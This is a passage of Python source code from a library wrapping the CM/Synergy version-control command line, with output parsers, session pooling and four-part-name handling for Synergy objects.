mresult = re.match(r"Saved work area options for project: '(.+)'", line, re.I)
#(?P<name>.+)-(?P<version>.+?)(:(?P<type>\S+):(?P<instance>\S+))?
if mresult != None:
#self.__project.name + "-" + mo.groupdict()['version'] + ":" + self.__project.type + ":" + self.__project.instance
self.__result_project = self._session.create(mresult.group(1))
_logger.debug("ProjectCheckoutResult: project: '%s'" % self.__result_project)
return
def __get_result_project(self):
""" return the checked out project. """
return self.__result_project
project = property(__get_result_project)
class ProjectPurposeResult(Result):
""" Parses purpose query output. """
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, output):
self._output = {}
for line in output.splitlines():
mresult = re.match(r"(?P<purpose>.+?)\s+(?P<member_status>\w+)\s+(?P<status>\w+)$", line)
if mresult != None:
data = mresult.groupdict()
if re.match(r'^\s+Purpose\s+Member$', data['purpose'], re.I) == None:
self._output[data['purpose'].strip()] = {'member_status' : data['member_status'].strip(),
'status' : data['status'].strip()
}
class ConflictsResult(Result):
""" Parses purpose query output. """
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, output):
self._output = {}
project = None
for line in output.splitlines():
mresult = re.match(r"Project:\s*(.+)\s*$", line)
if mresult != None:
project = self._session.create(mresult.group(1))
self._output[project] = []
mresult = re.match(r"^(.*)\s+(\w+#\d+)\s+(.+)$", line)
if mresult != None and project != None:
self._output[project].append({'object': self._session.create(mresult.group(1)),
'task': self._session.create("Task %s" % mresult.group(2)),
'comment': mresult.group(3)})
mresult = re.match(r"^(\w+#\d+)\s+(.+)$", line)
if mresult != None and project != None:
self._output[project].append({'task': self._session.create("Task %s" % mresult.group(1)),
'comment': mresult.group(2)})
class FinduseResult(Result):
""" Parses finduse query output. """
def __init__(self, ccm_object):
Result.__init__(self, ccm_object.session)
self.__object = ccm_object
def _setoutput(self, output):
self._output = []
for line in output.splitlines():
_logger.debug("FinduseResult: ---->%s<----" % line)
_logger.debug("FinduseResult: ---->%s-%s<----" % (self.__object.name, self.__object.version))
# MCNaviscroll\NaviAnim-username7@MCNaviscroll-username6
mresult = re.match(r"^\s*(?P<path>.+)[\\/]%s-%s@(?P<project>.+)" % (self.__object.name, self.__object.version), line, re.I)
if mresult != None:
data = mresult.groupdict()
_logger.debug("FinduseResult: %s" % data)
project = self._session.create(data['project'])
self._output.append({'path' : data['path'], 'project' : project})
class UpdateTemplateInformation(Result):
""" Parse update template information output. """
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, output):
"""
Baseline Selection Mode: Latest Baseline Projects
Prep Allowed: No
Versions Matching: *abs.50*
Release Purposes:
Use by Default: Yes
Modifiable in Database: tr1s60
In Use For Release: Yes
Folder Templates and Folders:
- Template assigned or completed tasks for %owner for release %release
- Template all completed tasks for release %release
- Folder tr1s60#4844: All completed Xuikon/Xuikon_rel_X tasks
- Folder tr1s60#4930: All tasks for release AppBaseDo_50
"""
self._output = {}
for line in output.splitlines():
rmo = re.match(r"^\s*(.+):\s*(.*)\s*", line)
if rmo != None:
if rmo.group(1) == "Baseline Selection Mode":
self._output['baseline_selection_mode'] = rmo.group(2)
elif rmo.group(1) == "Prep Allowed":
self._output['prep_allowed'] = (rmo.group(2) != "No")
elif rmo.group(1) == "Versions Matching":
self._output['version_matching'] = rmo.group(2)
elif rmo.group(1) == "Release Purposes":
self._output['release_purpose'] = rmo.group(2)
elif rmo.group(1) == "Use by Default":
self._output['default'] = (rmo.group(2) != "No")
elif rmo.group(1) == "Modifiable in Database":
self._output['modifiable_in_database'] = rmo.group(2).strip()
elif rmo.group(1) == "In Use For Release":
self._output['in_use_for_release'] = (rmo.group(2) != "No")
class UpdatePropertiesRefreshResult(Result):
""" Parse update template refresh output. """
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, output):
self._output = {'added': [], 'removed': []}
match_added = re.compile(r"^Added the following tasks")
match_removed = re.compile(r"^Removed the following tasks")
match_task_new = re.compile(r"^\s+(Task \S+#\d+)")
section = None
for line in output.splitlines():
res = match_added.match(line)
if res != None:
section = 'added'
continue
res = match_removed.match(line)
if res != None:
section = 'removed'
continue
if section is not None:
res = match_task_new.match(line)
if res != None:
self._output[section].append(self._session.create(res.group(1)))
continue
class UpdateResultSimple(Result):
""" Parse update output. """
def __init__(self, session):
Result.__init__(self, session)
self._success = True
def _setoutput(self, output):
self._output = output
match_failed = re.compile(r"(Update failed)")
for line in output.splitlines():
res = match_failed.match(line)
if res != None:
self._success = False
@property
def successful(self):
return self._success
class UpdateResult(UpdateResultSimple):
""" Parse update output. """
def __init__(self, session):
UpdateResultSimple.__init__(self, session)
def _setoutput(self, output):
self._output = {"tasks":[], "modifications": [], "errors": [], "warnings": []}
match_object_update = re.compile(r"^\s+'(.*)'\s+replaces\s+'(.*)'\s+under\s+'(.*)'\.")
match_object_new = re.compile(r"^\s+(?:Subproject\s+)?'(.*)'\s+is now bound under\s+'(.*)'\.")
match_task_new = re.compile(r"^\s+(Task \S+#\d+)")
match_no_candidate = re.compile(r"^\s+(.+) in project (.+) had no candidates")
match_update_failure = re.compile(r"^\s+Failed to use selected object\s+(.+)\s+under directory\s+(.+)\s+in project\s+(.+)\s+:\s+(.+)")
match_warning = re.compile(r"^Warning:(.*)")
match_failed = re.compile(r"(Update failed)")
# TODO: cleanup the parsing to do that in a more efficient way.
for line in output.splitlines():
_logger.info(line)
res = match_object_update.match(line)
if res != None:
self._output['modifications'].append({ "new": self._session.create(res.group(1)),
"old": self._session.create(res.group(2)),
"project": self._session.create(res.group(3))
})
continue
res = match_object_new.match(line)
if res != None:
self._output['modifications'].append({ "new": self._session.create(res.group(1)),
"old": None,
"project": self._session.create(res.group(2))
})
continue
res = match_task_new.match(line)
if res != None:
self._output['tasks'].append(self._session.create(res.group(1)))
continue
res = match_no_candidate.match(line)
if res != None:
self._output['errors'].append({'family': res.group(1),
'project': self._session.create(res.group(2)),
'comment': "had no candidates",
'line': line,
})
continue
res = match_update_failure.match(line)
if res != None:
self._output['errors'].append({'family': res.group(1),
'dir': self._session.create(res.group(2)),
'project': self._session.create(res.group(3)),
'comment': res.group(4),
'line': line,
})
continue
res = match_warning.match(line)
if res != None:
self._output['warnings'].append({'family': None,
'project': None,
'comment': res.group(1),
'line': line,
})
continue
res = match_failed.match(line)
if res != None:
self._success = False
self._output['errors'].append({'Serious': res.group(1),
})
continue
class WorkAreaInfoResult(Result):
""" Parse work area info output. """
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, output):
""" Returns a dict with the following fields:
* project: a ccm.Project instance
* maintain: a boolean
* copies: a boolean
* relative: a boolean
* time: a boolean
* translate: a boolean
* modify: a boolean
* path: a string representing the project wa path
"""
self._output = None
for line in output.splitlines():
mresult = re.match(r"(?P<project>.*)\s+(?P<maintain>TRUE|FALSE)\s+(?P<copies>TRUE|FALSE)\s+(?P<relative>TRUE|FALSE)\s+(?P<time>TRUE|FALSE)\s+(?P<translate>TRUE|FALSE)\s+(?P<modify>TRUE|FALSE)\s+'(?P<path>.*)'", line)
if mresult != None:
data = mresult.groupdict()
self._output = {'project': self._session.create(data['project']),
'maintain' : data['maintain'] == "TRUE",
'copies' : data['copies'] == "TRUE",
'relative' : data['relative'] == "TRUE",
'time' : data['time'] == "TRUE",
'translate' : data['translate'] == "TRUE",
'modify' : data['modify'] == "TRUE",
'path' : data['path']
}
return
class CreateNewTaskResult(Result):
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, output):
self._output = None
for line in output.splitlines():
mresult = re.match(r"Task\s+(?P<task>\S+\#\d+)\s+created\.", line)
if mresult != None:
self._output = self._session.create("Task " + mresult.groupdict()['task'])
return
class AttributeNameListResult(Result):
""" Class that abstract ccm call result handling.
Subclass it to implement a new generic output parser.
"""
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, obj):
def _create(arg):
mresult = re.match(r"^\s*(?P<name>\w+)", arg.strip())
if mresult != None:
return mresult.groupdict()['name']
return None
self._output = [_create(line) for line in obj.strip().splitlines()]
class ObjectListResult(Result):
""" Parses an object list Synergy output. """
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, obj):
self._output = []
if re.match(r"^None|^No tasks|^Warning", obj, re.M) != None:
return
def _create(arg):
arg = arg.strip()
if arg != "":
return self._session.create(arg)
return None
result = [_create(line) for line in obj.strip().splitlines()]
for result_line in result:
if result_line != None:
self._output.append(result_line)
class DataMapperListResult(Result):
""" Parses an object list Synergy output. """
dataconv = {'ccmobject': lambda x, y: x.create(y),
'string': lambda x, y: y,
'int': lambda x, y: int(y),
'boolean': lambda x, y: (y.lower() == "true")}
def __init__(self, session, separator, keywords, datamodel):
self._separator = separator
self._keywords = keywords
self._datamodel = datamodel
Result.__init__(self, session)
def format(self):
formatted_keywords = ["%s%s%s%%%s" % (self._separator, x, self._separator, x) for x in self._keywords]
return "".join(formatted_keywords) + self._separator
def regex(self):
regex_keywords = [r'%s%s%s(.*?)' % (self._separator, x, self._separator) for x in self._keywords]
regex = r''.join(regex_keywords)
regex = r"%s%s\s*\n" % (regex, self._separator)
return re.compile(regex, re.MULTILINE | re.I | re.DOTALL | re.VERBOSE | re.U)
def _setoutput(self, obj):
self._output = []
regex = self.regex()
_logger.debug("Regex %s" % (regex.pattern))
for match in regex.finditer(obj):
_logger.debug("Found: %s" % (match))
if match != None:
output_line = {}
for i in range(len(self._datamodel)):
_logger.debug("Found %d: %s" % (i, match.group(i + 1)))
model = self._datamodel[i]
output_line[self._keywords[i]] = self.dataconv[model](self._session, match.group(i + 1))
i += 1
self._output.append(output_line)
class FolderCopyResult(Result):
""" Parses a folder copy result """
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, output):
self._output = None
for line in output.splitlines():
mo = re.match(r"appended to", line)
if mo != None:
self._output = self._session.create(line)
return
CHECKOUT_LOG_RULES = [[r'^Derive failed for', logging.ERROR],
[r'^Serious:', logging.ERROR],
[r'^Warning: .* failed.', logging.ERROR],
[r'^Invalid work area', logging.ERROR],
[r'^WARNING:', logging.WARNING],
[r'^Warning:', logging.WARNING],]
UPDATE_LOG_RULES = [[r'^Update failed.', logging.ERROR],
[r'^Serious:', logging.ERROR],
[r'^\s+Failed to', logging.ERROR],
[r'^\d+ failures to', logging.ERROR],
[r"^Warning: This work area '.+' cannot be reused", logging.ERROR],
[r'^Rebind of .* failed', logging.ERROR],
[r'^Warning: .* failed.', logging.ERROR],
[r'^Skipping \'.*\'\. You do not have permission to modify this project.', logging.ERROR],
[r'^Work area conflict exists for file', logging.ERROR],
[r'^Warning: No candidates found for directory entry', logging.ERROR],
[r'^WARNING:', logging.WARNING],
[r'^Warning:', logging.WARNING],]
CONFLICTS_LOG_RULES = [[r'^\w+#\d+\s+Implicit', logging.WARNING],
[r'^(.*)\s+(\w+#\d+)\s+(.+)', logging.WARNING],
[r'.*Explicitly specified but not included', logging.WARNING],]
SYNC_LOG_RULES = [[r'^\s+0\s+Conflict\(s\) for project', logging.INFO],
[r'^\s+\d+\s+Conflict\(s\) for project', logging.ERROR],
[r'^Project \'.*\' does not maintain a workarea.', logging.ERROR],
[r'^Work area conflict exists for file', logging.ERROR],
[r'^Warning: Conflicts detected during synchronization. Check your logs.', logging.ERROR],
[r'^Warning:', logging.WARNING],]
def log_result(result, rules, logger=None):
""" Rules it a list of tuple defining a regular expression and an log level. """
if logger is None:
logger = _logger
crules = []
if rules is not None:
for rule in rules:
crules.append([re.compile(rule[0]), rule[1]])
for line in str(result).splitlines():
for rule in crules:
if rule[0].match(line) != None:
logger.log(rule[1], line)
break
else:
logger.info(line)
class AbstractSession(object):
"""An abstract Synergy session.
Must be overridden to implement either a single session or
multiple session handling.
"""
def __init__(self, username, engine, dbpath, ccm_addr):
self.username = username
self.engine = engine
self.dbpath = dbpath
self._session_addr = ccm_addr
# internal object list
self.__ccm_objects = {}
def addr(self):
""" Returns the Synergy session id."""
return self._session_addr
def database(self):
_logger.debug("AbstractSession: database")
self.__find_dbpath()
_logger.debug("AbstractSession: database: %s" % self.dbpath)
return os.path.basename(self.dbpath)
def __find_dbpath(self):
""" retrieve the database path from current session status. """
_logger.debug("AbstractSession: __find_dbpath")
if (self.dbpath != None):
return
result = self.execute("status")
for match in re.finditer(r'(?:(?:Graphical)|(?:Command)) Interface\s+@\s+(?P<ccmaddr>\w+:\d+(?:\:\d+\.\d+\.\d+\.\d+)+)(?P<current_session>\s+\(current\s+session\))?\s*\nDatabase:\s*(?P<dbpath>\S+)', result.output, re.M | re.I):
d = match.groupdict()
if (d['current_session'] != None):
_logger.debug("AbstractSession: __find_dbpath: Found dbpath: %s" % d['dbpath'])
self.dbpath = d['dbpath']
assert self.dbpath != None
def execute(self, _, result=None):
""" Abstract function that should implement the execution of ccm command
line call.
"""
return result
def create(self, fpn):
""" Object factory, this is the toolkit entry point to create objects from
four part names. Objects are stored into a dictionary, so you have
only one wrapper per synergy object.
"""
result = re.search(r"^(?P<project>.+)-(?P<version>[^:]+?)$", fpn)
if result != None:
matches = result.groupdict()
fpn = "%s-%s:project:%s#1" % (matches['project'], matches['version'], self.database())
_logger.debug("session.create('%s')" % fpn)
ofpn = FourPartName(fpn)
if not self.__ccm_objects.has_key(str(fpn)):
obj = None
if ofpn.type == 'project':
obj = Project(self, fpn)
elif ofpn.type == 'dir':
obj = Dir(self, fpn)
elif ofpn.type == 'task':
obj = Task(self, fpn)
elif ofpn.type == 'folder':
obj = Folder(self, fpn)
elif ofpn.type == 'releasedef':
obj = Releasedef(self, fpn)
else:
obj = File(self, fpn)
self.__ccm_objects[str(fpn)] = obj
return self.__ccm_objects[str(fpn)]
def get_workarea_info(self, dir_):
""" Return a dictionary containing workarea info from directory dir.
"""
if (not os.path.exists(dir_)):
raise CCMException("Error retrieving work_area info for the directory '%s' (doesn't exists)" % dir_)
path = os.path.abspath(os.path.curdir)
path_ccmwaid = os.path.join(dir_,"_ccmwaid.inf");
if(not os.path.exists(path_ccmwaid)):
raise CCMException("No work area in '%s'" % dir_)
os.chdir(dir_)
result = self.execute("wa -show", WorkAreaInfoResult(self))
os.chdir(path)
if result.output == None:
raise CCMException("Error retrieving work_area info for the directory '%s'" % dir_)
return result.output
def _get_role(self):
result = self.execute("set role")
return result.output.strip()
def _set_role_internal(self, role):
""" method to be override by child class else property accession is not working properly. """
if role == None or len(role) == 0:
raise CCMException("You must provide a role.")
result = self.execute("set role %s" % role)
if re.match(r'^Warning:', result.output, re.M) != None:
raise CCMException("Error switching to role %s: %s" %(role, result.output.strip()))
def _set_role(self, role):
self._set_role_internal(role)
role = property(fget=_get_role, fset=_set_role)
def _get_home(self):
result = self.execute("set Home")
return result.output.strip()
def _set_home(self, home):
if len(home) == 0 or home == None:
raise CCMException("You must provide a home.")
result = self.execute("set Home %s" % home)
if re.match(r'^Warning:', result.output, re.M) != None:
raise CCMException("Error switching to Home %s: %s" %(home, result.output.strip()))
home = property(_get_home, _set_home)
def close(self):
pass
def __str__(self):
self.__find_dbpath()
return self._session_addr + ':' + self.dbpath
def __repr__(self):
return self.__str__()
def __del__(self):
self.close()
def purposes(self, role=None):
""" Returns available purposes. """
args = ""
if role != None:
args = "-role \"%s\"" % role
result = self.execute("project_purpose -show %s" % args, ProjectPurposeResult(self))
return result.output
class Session(AbstractSession):
"""A Synergy session.
"""
def __init__(self, username, engine, dbpath, ccm_addr, close_on_exit=True):
AbstractSession.__init__(self, username, engine, dbpath, ccm_addr)
self._execute_lock = threading.Lock()
self.close_on_exit = close_on_exit
@staticmethod
def start(username, password, engine, dbpath, timeout=300):
if username == None:
raise CCMException('username is not valid')
if password == None:
raise CCMException('password is not valid')
if CCM_BIN == None:
raise CCMException("Could not find CM/Synergy executable in the path.")
command = "%s start -m -q -nogui -n %s -pw %s -h %s -d %s" % \
(CCM_BIN, username, password, engine, dbpath)
_logger.debug('Starting new session:' + command.replace(password, "***"))
(result, status) = _execute(command, timeout=timeout)
if status != 0:
raise Exception("Error creating a session: result:\n%s\nCommand: %s" % (result, command.replace(password, "***")))
session_addr = result.strip()
_logger.debug(session_addr)
if not re.match(r'[a-zA-Z0-9_-]+:\d+:\d+\.\d+\.\d+\.\d+(:\d+\.\d+\.\d+\.\d+)?', session_addr):
raise Exception("Error creating a session: result:\n%s" % result)
return Session(username, engine, dbpath, session_addr)
def execute(self, cmdline, result=None):
""" Executes a Synergy CLI operation. """
if self._session_addr == None:
raise CCMException("No Synergy session running")
if CCM_BIN == None:
raise CCMException("Could not find CM/Synergy executable in the path.")
self._execute_lock.acquire()
output = ""
error = ""
try:
if result == None:
result = Result(self)
if os.sep == '\\':
command = "set CCM_ADDR=" + self._session_addr + " && " + CCM_BIN + " %s" % cmdline
else:
command = "export CCM_ADDR=" + self._session_addr + " && " + CCM_BIN + " %s" % cmdline
_logger.debug('Execute > ' + command)
if hasattr(result, 'error'):
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = process.stdout.read()
error = process.stderr.read()
result.status = process.returncode
else:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output = process.stdout.read()
result.status = process.returncode
finally:
self._execute_lock.release()
result.output = output.strip()
if hasattr(result, 'error'):
result.error = error.strip()
return result
def close(self):
""" Closes this Synergy session if it was not previously running anyway. """
_logger.debug("Closing session %s" % self._session_addr)
if self._session_addr != None and self.close_on_exit:
_logger.debug("Closing session %s" % self._session_addr)
self._execute_lock.acquire()
if os.sep == '\\':
command = "set CCM_ADDR=" + self._session_addr + " && " + CCM_BIN + " stop"
else:
command = "export CCM_ADDR=" + self._session_addr + " && " + CCM_BIN + " stop"
_logger.debug('Execute > ' + command)
pipe = os.popen(command)
pipe.close()
self._session_addr = None
self._execute_lock.release()
elif self._session_addr != None and not self.close_on_exit:
_logger.debug("Keeping session %s alive." % self._session_addr)
class SessionPool(AbstractSession):
""" Session that transparently handled several subsession, to easily enable
multithreaded application.
"""
def __init__(self, username, password, engine, dbpath, database=None, size=4, opener=None):
AbstractSession.__init__(self, username, engine, dbpath, None)
self._opener = opener
if self._opener is None:
self._opener = open_session
self._free_sessions = []
self._used_sessions = []
self._thread_sessions = {}
self._pool_lock = threading.Condition()
self._lock_pool = False
self.__password = password
self.__database = database
self.size = size
def _set_size(self, size):
""" Set the pool size """
self._pool_lock.acquire()
poolsize = len(self._free_sessions) + len(self._used_sessions)
if poolsize > size:
to_be_remove = poolsize - size
self._lock_pool = True
while len(self._free_sessions) < to_be_remove:
self._pool_lock.wait()
for _ in range(to_be_remove):
self._free_sessions.pop().close()
self._lock_pool = False
else:
for _ in range(size - poolsize):
self._free_sessions.append(self._opener(self.username, self.__password, self.engine, self.dbpath, self.__database, False))
self._pool_lock.release()
def _get_size(self):
self._pool_lock.acquire()
poolsize = len(self._free_sessions) + len(self._used_sessions)
self._pool_lock.release()
return poolsize
size = property (_get_size, _set_size)
def execute(self, cmdline, result=None):
""" Executing a ccm command on a free session. """
_logger.debug("SessionPool:execute: %s %s" % (cmdline, type(result)))
# waiting for a free session
self._pool_lock.acquire()
# check for recursion, in that case reallocate the same session,
if threading.currentThread() in self._thread_sessions:
_logger.debug("Same thread, reusing allocation session.")
# release the pool and reuse associated session
self._pool_lock.release()
return self._thread_sessions[threading.currentThread()].execute(cmdline, result)
while len(self._free_sessions)==0 or self._lock_pool:
self._pool_lock.wait()
session = self._free_sessions.pop(0)
self._used_sessions.append(session)
self._thread_sessions[threading.currentThread()] = session
self._pool_lock.release()
# running command
try:
result = session.execute(cmdline, result)
finally:
# we can now release the session - anyway
self._pool_lock.acquire()
self._thread_sessions.pop(threading.currentThread())
self._used_sessions.remove(session)
self._free_sessions.append(session)
self._pool_lock.notifyAll()
self._pool_lock.release()
return result
def close(self):
""" Closing all subsessions. """
_logger.debug("Closing session pool sub-sessions")
self._lock_pool = True
self._pool_lock.acquire()
while len(self._used_sessions) > 0:
_logger.debug("Waiting to free used sessions.")
_logger.debug("Waiting to free used sessions. %s %s" % (len(self._used_sessions), len(self._free_sessions)))
_logger.debug(self._used_sessions)
_logger.debug(self._free_sessions)
self._pool_lock.wait()
_logger.debug("Closing all free session from the pool.")
while len(self._free_sessions) > 0:
self._free_sessions.pop().close()
self._lock_pool = False
self._pool_lock.notifyAll()
self._pool_lock.release()
def _set_role_internal(self, role):
""" Set role on all subsessions. """
self._lock_pool = True
self._pool_lock.acquire()
while len(self._used_sessions)!=0:
self._pool_lock.wait()
try:
for session in self._free_sessions:
session.role = session._set_role(role)
finally:
self._lock_pool = False
self._pool_lock.notifyAll()
self._pool_lock.release()
class Query(object):
""" This object wrap a synergy query, it takes a query as input as well as the
attribute you want as output, and get them translated using the model configuration.
e.g
Query(session, "type='task' and release='test/next'", ['objectname', 'task_synopsis'], ['ccmobject', 'string'])
This will return a list of hash: [{'objectname': Task(xxx), 'task_synopsis': 'xxx'}, ...]
"""
def __init__(self, session, query, keywords, model, cmd="query"):
""" Initialize a Synergy query."""
self._session = session
self._query = query
self._keywords = keywords
self._model = model
self._cmd = cmd
def execute(self):
""" Executing the query on the database. """
mapper = DataMapperListResult(self._session, '@@@', self._keywords, self._model)
query = "%s %s -u -f \"%s\"" % (self._cmd, self._query, mapper.format())
return self._session.execute(query, mapper)
class InvalidFourPartNameException(CCMException):
""" Badly formed Synergy four-part name. """
def __init__(self, fpn = ""):
CCMException.__init__(self, fpn)
class FourPartName(object):
""" This class handle four part name parsing and validation.
"""
def __init__(self, ifpn):
""" Create a FourPartName object based on a ifpn string.
The string have to match the following patterns:
- name-version:type:instance
- name:version:releasedef:instance
- Task database#id
- Folder database#id
Anything else is considered as old release string format.
"""
_logger.debug("FourPartName: '%s'", ifpn)
fpn = FourPartName.convert(ifpn)
result = re.search(r"^(?P<name>.+)-(?P<version>.+?):(?P<type>\S+):(?P<instance>\S+)$", fpn)
if result == None:
result = re.search(r"^(?P<name>.+):(?P<version>.+?):(?P<type>releasedef):(?P<instance>\S+)$", fpn)
if result == None:
raise InvalidFourPartNameException(fpn)
# set all attributes
self._name = result.groupdict()['name']
self._version = result.groupdict()['version']
self._type = result.groupdict()['type']
self._instance = result.groupdict()['instance']
def __getname(self):
""" Returns the name of the object. """
return self._name
def __getversion(self):
""" Returns the version of the object. """
return self._version
def __gettype(self):
""" Returns the type of the object. """
return self._type
def __getinstance(self):
""" Returns the instance of the object. """
return self._instance
def __getobjectname(self):
""" Returns the objectname of the object. """
if (self.type == 'releasedef'):
return "%s:%s:%s:%s" % (self.name, self.version, self.type, self.instance)
return "%s-%s:%s:%s" % (self.name, self.version, self.type, self.instance)
def __str__(self):
""" Returns the string representation of the object. """
return self.objectname
def __repr__(self):
""" Returns the string representation of the python object. """
if (self.type == 'releasedef'):
return "<%s:%s:%s:%s>" % (self.name, self.version, self.type, self.instance)
return "<%s-%s:%s:%s>" % (self.name, self.version, self.type, self.instance)
def is_same_family(self, ccmobject):
""" Returns True if the ccmobject is part of the same family (=same name, type and instance) as self. """
assert isinstance(ccmobject, FourPartName)
return (self.name == ccmobject.name and self.type == ccmobject.type and self.instance == ccmobject.instance)
def __getfamily(self):
return "%s:%s:%s" % (self.name, self.type, self.instance)
def __eq__(self, ccmobject):
""" Returns True if object four parts name are identical. """
if ccmobject == None:
return False
assert isinstance(ccmobject, FourPartName)
return (self.name == ccmobject.name and self.version == ccmobject.version and self.type == ccmobject.type and self.instance == ccmobject.instance)
def __ne__(self, ccmobject):
""" Returns True if object four parts name are different. """
if ccmobject == None:
return True
assert isinstance(ccmobject, FourPartName)
return (self.name != ccmobject.name or self.version != ccmobject.version or self.type != ccmobject.type or self.instance != ccmobject.instance)
@staticmethod
def is_valid(fpn):
""" Check if a given string represents a valid four part name.
"""
return (re.match(r"^(.+)-(.+?):(\S+):(\S+)|(.+):(.+?):releasedef:(\S+)$", fpn) != None)
@staticmethod
def convert(fpn):
""" Update a CCM output string to a valid four part name. This is due to the inconsistent
output of CM/Synergy CLI.
"""
fpn = fpn.strip()
if FourPartName.is_valid(fpn):
return fpn
result = re.search(r"^(?P<type>Task|Folder)\s+(?P<instance>\w+)#(?P<id>\d+)$", fpn)
if result != None:
matches = result.groupdict()
if matches["type"] == "Task":
return "task%s-1:task:%s" % (matches["id"], matches["instance"])
elif matches["type"] == "Folder":
return "%s-1:folder:%s" % (matches['id'], matches['instance'])
else:
result = re.search(r"^(?P<project>\S+)/(?P<version>\S+)$", fpn)
if result != None:
matches = result.groupdict()
return "%s:%s:releasedef:1" % (matches['project'], matches['version'])
else:
# Check the name doesn't contains any of the following character: " :-"
result = re.search(r"^[^\s^:^-]+$", fpn)
if result != None:
return "none:%s:releasedef:1" % (fpn)
raise InvalidFourPartNameException(fpn)
name = property (__getname)
version = property (__getversion)
type = property (__gettype)
instance = property (__getinstance)
objectname = property (__getobjectname)
family = property(__getfamily)
class CCMObject(FourPartName):
""" Base class for any Synergy object. """
def __init__(self, session, fpn):
FourPartName.__init__(self, fpn)
self._session = session
def _getsession(self):
return self._session
session = property(_getsession)
def exists(self):
""" Check if an the object exists in the database. """
return (len(self._session.execute("query \"name='%s' and version='%s' and type='%s' and instance='%s'\" -u -f \"%%objectname\"" % (self.name, self.version, self.type, self.instance), ObjectListResult(self._session)).output) == 1)
def __setitem__(self, name, value):
project = ""
if self.type == 'project':
project = "-p"
if value.endswith("\\"):
value += "\\"
result = self._session.execute("attribute -modify \"%s\" -v \"%s\" %s \"%s\"" % (name, value, project, self))
if result.status != 0 and result.status != None:
raise CCMException("Error modifying '%s' attribute. Result: '%s'" % (name, result.output), result)
def __getitem__(self, name):
""" Provides access to Synergy object attributes through the dictionary
item interface.
"""
result = self._session.execute("query \"name='%s' and version='%s' and type='%s' and instance='%s'\" -u -f \"%%%s\"" % (self.name, self.version, self.type, self.instance, name), ResultWithError(self._session))
if result.status != 0 and result.status != None:
raise CCMException("Error retrieving '%s' attribute. Result: '%s'" % (name, result.output), result)
if len(result.error.strip()) > 0:
raise CCMException("Error retrieving '%s' attribute. Reason: '%s'" % (name, result.error), result)
if result.output.strip() == "<void>":
return None
return result.output.strip()
def create_attribute(self, name, type_, value=None):
if name in self.keys():
raise CCMException("Attribute '%s' already exist." % (name))
args = ""
proj_arg = ""
if value != None:
args += " -value \"%s\"" % value
if self.type == "project":
proj_arg = "-p"
result = self._session.execute("attribute -create \"%s\" -type \"%s\" %s %s \"%s\"" % (name, type_, args, proj_arg, self.objectname))
if result.status != 0 and result.status != None:
raise CCMException("Error creating '%s' attribute. Result: '%s'" % (name, result.output), result)
def keys(self):
""" The list of supported Synergy attributes. """
result = self._session.execute("attribute -la \"%s\"" % self, AttributeNameListResult(self._session))
return result.output
def is_predecessor_of(self, o):
result = self._session.execute("query \"is_predecessor_of('%s') and name='%s'and version='%s'and type='%s'and instance='%s'\" -u -f \"%%objectname\"" % (o, self.name, self.version, self.type, self.instance), ObjectListResult(self._session))
if len(result.output):
return True
return False
def predecessors(self):
result = self._session.execute("query \"is_predecessor_of('%s')\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
return result.output
def successors(self):
result = self._session.execute("query \"is_successor_of('%s')\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
return result.output
def is_recursive_predecessor_of(self, o):
result = self._session.execute("query \"has_predecessor('%s')\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
for s in result.output:
if s == o:
return True
for s in result.output:
if s.is_recursive_predecessor_of(o):
return True
return False
def is_recursive_predecessor_of_fast(self, o):
""" Fast implementation of the recursive is_predecessor_of method. """
input_objects = [self]
while len(input_objects) > 0:
query = " or ".join(["has_predecessor('%s')" % x for x in input_objects])
result = self._session.execute("query \"query\" -u -f \"%%objectname\"" % query, ObjectListResult(self._session))
for s in result.output:
if s == o:
return True
return False
def is_recursive_sucessor_of(self, o):
result = self._session.execute("query \"has_successor('%s')\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
for s in result.output:
if s == o:
return True
for s in result.output:
if s.is_recursive_sucessor_of(o):
return True
return False
def is_recursive_successor_of_fast(self, o):
""" Fast implementation of the recursive is_successor_of method. """
input_objects = [self]
while len(input_objects) > 0:
query = " or ".join(["has_successor('%s')" % x for x in input_objects])
result = self._session.execute("query \"query\" -u -f \"%%objectname\"" % query, ObjectListResult(self._session))
for s in result.output:
if s == o:
return True
return False
def relate(self, ccm_object):
result = self._session.execute("relate -name successor -from \"%s\" -to \"%s\"" % self, ccm_object, Result(self._session))
if result.status != None and result.status != 0:
raise CCMException("Error relating objects %s to %s\n%s" % (self, ccm_object, result.output))
def finduse(self):
""" Tries to find where an object is used. """
result = self._session.execute("finduse \"%s\"" % self, FinduseResult(self))
return result.output
class File(CCMObject):
""" Wrapper for any Synergy file object """
def __init__(self, session, fpn):
CCMObject.__init__(self, session, fpn)
def content(self):
result = self._session.execute("cat \"%s\"" % self)
return result.output
def to_file(self, path):
if os.path.exists(path):
_logger.error("Error file %s already exists" % path)
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
# Content to file
result = self._session.execute("cat \"%s\" > \"%s\"" % (self, os.path.normpath(path)))
if result.status != 0 and result.status != None:
raise CCMException("Error retrieving content from object %s in %s (error status: %s)\n%s" % (self, path, result.status, result.output), result)
def merge(self, ccm_object, task):
assert ccm_object != None, "object must be defined."
assert task != None, "task must be defined."
assert task.type == "task", "task parameter must be of 'task' type."
result = self._session.execute("merge -task %s \"%s\" \"%s\"" % (task['displayname'], self, ccm_object))
validity = 0
for line in result.output.splitlines():
if re.match(r"Merge Source completed successfully\.", line):
validity = 2
elif re.match(r"Warning: Merge Source warning. \(overlaps during merge\)\.", line):
validity = 1
else:
result = re.match(r"Associated object\s+(?P<object>.+)\s+with task", line)
if result != None:
return (self._session.create(result.groupdict()['object']), validity)
raise CCMException("Error during merge operation.\n" + result.output, result)
def checkin(self, state, comment=None):
